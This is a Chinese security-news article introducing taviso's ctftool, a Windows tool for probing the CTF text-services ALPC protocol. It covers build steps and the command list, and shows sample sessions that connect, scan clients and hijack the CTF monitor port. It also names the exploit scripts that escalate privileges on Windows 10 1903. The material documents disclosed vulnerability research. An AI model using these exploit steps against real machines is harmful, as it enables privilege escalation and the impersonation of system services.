2020-02-29 16:00:40 Author: www.freebuf.com(查看原文) 阅读量:219 收藏





git clone https://github.com/taviso/ctftool.git



我们使用了GNU make和Visual Studio 2019来开发Ctftool,目前该项目仅支持32位版本,但是该工具支持在Windows x86和x64平台上运行。


这里,我使用的构建工具是一个变种版本的Visual Studio,构建时我只选择了MSVC、MSBuild、CMake和SDK。


git submodule update --init --recursive


Ctftool目前已在Windows 7、Windows 8和Windows 10上进行了测试,并且支持32位和64位版本。

广大演技人员可以使用“help”命令来查看该工具支持的命令列表,或者输入“help <command>”来查看具体命令的使用方式:

$ ./ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help
Type `help <command>` for help with a specific command.
Any line beginning with # is considered a comment.

help            - List available commands.
exit            - Exit the shell.
connect         - Connect to CTF ALPC Port.
info            - Query server informaiton.
scan            - Enumerate connected clients.
callstub        - Ask a client to invoke a function.
createstub      - Ask a client to instantiate CLSID.
hijack          - Attempt to hijack an ALPC server path.
sendinput       - Send keystrokes to thread.
setarg          - Marshal a parameter.
getarg          - Unmarshal a parameter.
wait            - Wait for a process and set it as the default thread.
thread          - Set the default thread.
sleep           - Sleep for specified milliseconds.
forget          - Forget all known stubs.
stack           - Print the last leaked stack ptr.
marshal         - Send command with marshalled parameters.
proxy           - Send command with proxy parameters.
call            - Send command without appended data.
window          - Create and register a message window.
patch           - Patch a marshalled parameter.
module          - Print the base address of a module.
module64        - Print the base address of a 64bit module.
editarg         - Change the type of a marshalled parameter.
symbol          - Lookup a symbol offset from ImageBase.
set             - Change or dump various ctftool parameters.
show            - Show the value of special variables you can use.
lock            - Lock the workstation, switch to Winlogon desktop.
repeat          - Repeat a command multiple times.
run             - Run a command.
script          - Source a script file.
print           - Print a string.
consent         - Invoke the UAC consent dialog.
reg             - Lookup a DWORD in the registry.
gadget          - Find the offset of a pattern in a file.
section         - Lookup property of PE section.
Most commands require a connection, see "help connect".


ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault1") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 00000264
ctf> scan
Client 0, Tid 3400 (Flags 0x08, Hwnd 00000D48, Pid 8696, explorer.exe)
Client 1, Tid 7692 (Flags 0x08, Hwnd 00001E0C, Pid 8696, explorer.exe)
Client 2, Tid 9424 (Flags 0x0c, Hwnd 000024D0, Pid 9344, SearchUI.exe)
Client 3, Tid 12068 (Flags 0x08, Hwnd 00002F24, Pid 12156, PROCEXP64.exe)
Client 4, Tid 9740 (Flags 0000, Hwnd 0000260C, Pid 3840, ctfmon.exe)



该工具可以用来扫描和发现CTF协议中许多严重的安全问题,如果你想在Windows 10 x64 1903上运行该工具并测试漏洞,可以直接双击运行ctftool.exe,并运行下列命令:

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> script .\scripts\ctf-consent-system.ctf



ctf> script .\scripts\ctf-exploit-common-win10.ctf


由于CTF协议中的客户端跟服务器端之间不需要身份认证,那么如果攻击者有权限写入\BaseNamedObjects的话,他就可以创建CTF ALPC端口,并伪装成监控器。



An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
ctf> hijack Default 1
NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00  ..0.. ......D...
000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00  .....f......D...
000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05  ............ ...
A a message received
        ProcessID: 4352, SearchUI.exe
        ThreadId: 4420
        WindowID: 00020180
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00  ..0.. ..........
000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00  .y...f..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00  ................
A a message received
        ProcessID: 4012, explorer.exe
        ThreadId: 780
        WindowID: 00010110
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00  ..0.. ..........
000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00  ....*g..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00  ............X...
A a message received
        ProcessID: 4012, explorer.exe
        ThreadId: 780



An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help connect
Connect to CTF ALPC Port.

Without any parameters, connect to the ctf monitor for the current
desktop and session. All subsequent commands will use this connection
for communicating with the ctf monitor.

If a connection is already open, the existing connection is closed first.

If DESKTOPNAME and SESSIONID are specified, a connection to ctf monitor
for another desktop and session are opened, if it exists.
If the specified port does not exist, wait until it does exist. This is
so that you can wait for a session that hasn't started
yet in a script.
 Connect to the monitor for current desktop
  ctf> connect
 Connect to a specific desktop and session.
  ctf> connect Default 1
Most commands require a connection, see "help connect".





* 参考来源:taviso,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

文章来源: https://www.freebuf.com/sectool/227330.html